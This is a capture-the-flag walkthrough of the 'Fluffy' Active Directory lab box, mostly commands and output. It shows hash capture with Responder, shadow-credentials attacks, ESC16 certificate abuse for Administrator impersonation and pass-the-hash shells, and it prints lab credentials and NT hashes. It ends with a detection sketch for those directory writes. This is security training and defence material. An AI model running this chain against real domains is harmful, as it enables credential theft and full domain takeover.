# Fluffy

## User

We are provided access to the user `j.fleischman:J0elTHEM4n1990!`.

Using netexec, we can quickly enumerate share permissions to see where this user can read or write.

```bash
netexec smb 10.10.11.69 -u j.fleischman -p  J0elTHEM4n1990!  --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
```

The `IT` share stands out as the only one the user can write to, so let's use `impacket-smbclient` to take a look at it.

```bash
impacket-smbclient j.fleischman@10.10.11.69 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 .
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 ..
drw-rw-rw-          0  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw-    1827464  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw-          0  Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw-    3225346  Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw-     169963  Sat May 17 22:31:07 2025 Upgrade_Notice.pdf
```

`Upgrade_Notice.pdf` points to a particular [CVE](https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC); cloning the PoC and running `Responder` gives us a callback with an NTLMv2 hash.

```bash
sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.85]
    Responder IPv6             [dead:beef:4::1053]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-I3SM06WIZWL]
    Responder Domain Name      [ZKM3.LOCAL]
    Responder DCE-RPC Port     [45843]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:8db68836481e820b...
```

Cracking it gives us access to the user `p.agila:prometheusx-303`.

As always, we use BloodHound to map out possible AD attack paths.

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2FKEcNTR2LoHCZh1UCxtJW%2Fimage.png?alt=media&#x26;token=927c4a52-7fac-4427-995c-a40281a153b1" alt=""><figcaption><p>Looks simple enough</p></figcaption></figure>

`GenericAll` over the `Service Accounts` group lets us modify it freely, so we add the newly obtained `p.agila` to it with `net rpc`:

```bash
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69                                                                                                                         
net rpc group members "Service Accounts"  -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69        
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc
```

`GenericWrite` over the service accounts lets us perform either a targeted Kerberoasting attack or a shadow credentials attack (the latter requires AD CS). We opt for shadow credentials, since the presence of `ca_svc` suggests AD CS is in use.

```bash
certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```

{% code overflow="wrap" %}

```bash
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls


    Directory: C:\Users\winrm_svc


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/17/2025  11:56 AM                Desktop
d-r---        5/19/2025   9:15 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/3/2025  10:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
<REDACTED>
```

{% endcode %}

## Root

`winrm_svc` has `GenericWrite` over the users `ldap_svc` and `ca_svc`, which means we can perform the shadow credentials attack again to retrieve their respective NT hashes.

{% code overflow="wrap" %}

```bash
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
                                                                                                                             
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```

{% endcode %}

`ca_svc` is a member of the `Cert Publishers` group, and querying the CA with `certipy` shows it is vulnerable to [ESC16](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally): the CA has the SID security extension (`szOID_NTDS_CA_SECURITY_EXT`) disabled globally, so issued certificates carry no object SID and the DC falls back to mapping them by UPN.

Looking at the documentation, we go with scenario A, as we fulfil its criteria with the users we already own.

{% hint style="info" %}
Attacker (`winrm_svc@fluffy.htb`) has `GenericWrite` permission over a "victim" account (`ca_svc@fluffy.htb`). The `victim` account can enroll in *any suitable client authentication template* (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is `administrator@fluffy.htb`.
{% endhint %}

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2FLA930NtuiejqfliezND4%2Fimage.png?alt=media&#x26;token=e3847453-9aad-4619-a1b1-8630c57aeda0" alt=""><figcaption></figcaption></figure>

First, we need to set the UPN of our victim account `ca_svc` to `administrator@fluffy.htb`.

```bash
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69  -upn 'administrator@fluffy.htb' -user 'ca_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'
```

Next, we request a certificate as the victim account `ca_svc`, authenticating with the `ca_svc.ccache` obtained earlier (`-k`) and specifying a client-authentication template such as `User`. The issued certificate carries the manipulated UPN.

```bash
certipy-ad -debug req -k  -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
    answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
    (request, answer) = resolution.next_request()
                        ~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
    raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

Lastly, we need to revert the UPN before authenticating as `Administrator`.

```bash
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69  -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'

certipy-ad auth -pfx administrator@fluffy.htb -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb       
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
 evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
<REDACTED>

```
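As an added defender-side example (not part of the writeup), the Python sketch below runs over constructed, simplified Windows Security event 5136 records and flags the two directory writes this chain depends on: a key credential added to another account's `msDS-KeyCredentialLink` (the shadow credentials step used in both the User and Root sections) and a `userPrincipalName` rewrite whose local part no longer matches the account, followed by its revert (ESC16 scenario A). The record shape, the assumption that the object's CN equals its sAMAccountName, and the one-hour revert window are my simplifications.

```python
"""Detection sketch: flag the two directory writes this box's chain relies on,
using simplified Windows Security event 5136 records (Directory Service Changes
auditing must be enabled on the DC for these to exist)."""
import re
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136


def first_rdn(dn: str) -> str:
    """'CN=ca_svc,CN=Users,DC=fluffy,DC=htb' -> 'ca_svc' (assumes CN == sAMAccountName)."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def find_alerts(events, revert_window=timedelta(hours=1)):
    """Return (kind, actor, target[, value]) tuples for suspicious writes."""
    alerts, pending_upn = [], {}  # pending_upn: ObjectDN -> (time, foreign UPN)
    for rec in sorted(events, key=lambda r: r["time"]):
        attr = rec["AttributeLDAPDisplayName"].lower()
        obj, actor = first_rdn(rec["ObjectDN"]), rec["SubjectUserName"].lower()
        added = rec["OperationType"] == VALUE_ADDED
        # Shadow credentials: someone other than the account adds a key credential.
        if attr == "msds-keycredentiallink" and added and actor != obj:
            alerts.append(("shadow_credentials", actor, obj))
        # ESC16 scenario A: UPN pointed at a different identity, then put back.
        if attr == "userprincipalname" and added:
            local = rec["AttributeValue"].split("@")[0].lower()
            if local != obj:
                alerts.append(("upn_hijack", actor, obj, rec["AttributeValue"]))
                pending_upn[rec["ObjectDN"]] = (rec["time"], rec["AttributeValue"])
            elif rec["ObjectDN"] in pending_upn:
                t0, foreign = pending_upn.pop(rec["ObjectDN"])
                if rec["time"] - t0 <= revert_window:
                    alerts.append(("upn_reverted", actor, obj, foreign))
    return alerts


def make_event(minute, actor, obj, attr, value, op=VALUE_ADDED):
    """Constructed, simplified 5136 record (not a real log line)."""
    return {"time": datetime(2025, 6, 4, 10, minute), "SubjectUserName": actor,
            "ObjectDN": f"CN={obj},CN=Users,DC=fluffy,DC=htb",
            "AttributeLDAPDisplayName": attr, "AttributeValue": value,
            "OperationType": op}


SAMPLE_5136 = [  # constructed: the writeup's sequence plus one benign self-enrolment
    make_event(0, "p.agila", "winrm_svc", "msDS-KeyCredentialLink", "B:828:<keycred>"),
    make_event(5, "winrm_svc", "ca_svc", "userPrincipalName", "administrator@fluffy.htb"),
    make_event(9, "winrm_svc", "ca_svc", "userPrincipalName", "ca_svc"),
    make_event(30, "j.fleischman", "j.fleischman", "msDS-KeyCredentialLink", "B:828:<keycred>"),
]
```

Running `find_alerts(SAMPLE_5136)` yields the three alerts for the writeup's sequence and nothing for the self-enrolment; a fourth check worth adding in production is whether the written UPN collides with an existing account's UPN.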
